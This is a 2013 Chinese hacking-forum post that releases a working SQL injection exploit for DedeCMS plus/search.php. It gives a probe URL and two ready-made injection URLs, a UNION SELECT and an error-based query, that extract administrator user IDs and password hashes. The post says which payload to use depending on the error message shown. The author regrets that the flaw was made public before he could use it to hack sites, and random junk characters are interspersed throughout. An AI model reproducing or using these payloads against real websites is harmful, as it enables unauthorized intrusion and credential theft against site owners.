中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
2 [8 B, }6 D+ x* ]. w
6 D8 E4 w0 Y z+ [" Q! I) ?1 M
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
7 L4 N3 g# T2 m, f
4 _9 W8 a9 q6 I8 b
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
# E9 A* P0 v; `
" E6 c$ b$ C) S
我一般是这样测试的:
3 l- Y2 I! y* ^' U7 Z c
( n9 s1 \: z, o; E
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
' ?+ s9 C9 G- t
9 ^" E3 x |0 M0 h* k6 R
转载不加作者名的没JJ
2 V0 u" h+ D; q+ J# j+ {
! d+ m: v+ b1 T( s1 r; k
作者:鬼哥
" @ ]! H' A! @& u
( g6 t( K1 z. {8 Y2 L# T
- c; R, }# y: _7 o; S7 t# M& t
: e9 x. K% k; U
看结果如果提示
) h; g* z; _( o% i+ {8 U
) }$ A s, I9 [; ~- x: x+ P4 q1 n
Safe Alert: Request Error step 2 !
4 ?! z0 k. J5 A) X9 N2 c! g% c+ G
6 Q+ R4 A7 v: k
那么直接用下面的exp
8 Z x/ b) g" E$ L& z2 H5 t8 Y
! z. z: ~' W9 O& f# c
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
6 P, `; L# V! H% e% Q# S4 a6 ]
% O8 C+ S4 r: L( [; _' X4 B& Y" T! o
$ p* d0 w/ h" Y7 z+ T+ @5 ]3 Q
看结果如果提示
8 P+ V! M6 T' D6 d$ e" W/ ~
) X( O2 W' w9 b @8 N
Safe Alert: Request Error step 1 !
7 e) f! Y, I: }1 B, Z# u
: P, t2 S q" N# z& M: z
那么直接用下面的exp
y) y1 J' k9 F0 P+ ^
: S8 M6 {) O+ o% F
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
$ H( e- p l0 j' k( J7 M" U
% G9 z/ [* `' p
0 @. F' g& @, U2 \' Y- W* u) `, o
如果正常显示证明漏洞不存在了。
3 \- R3 r2 P: W7 B
9 [0 O8 t0 ^' N/ A K; P+ O) o( J
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2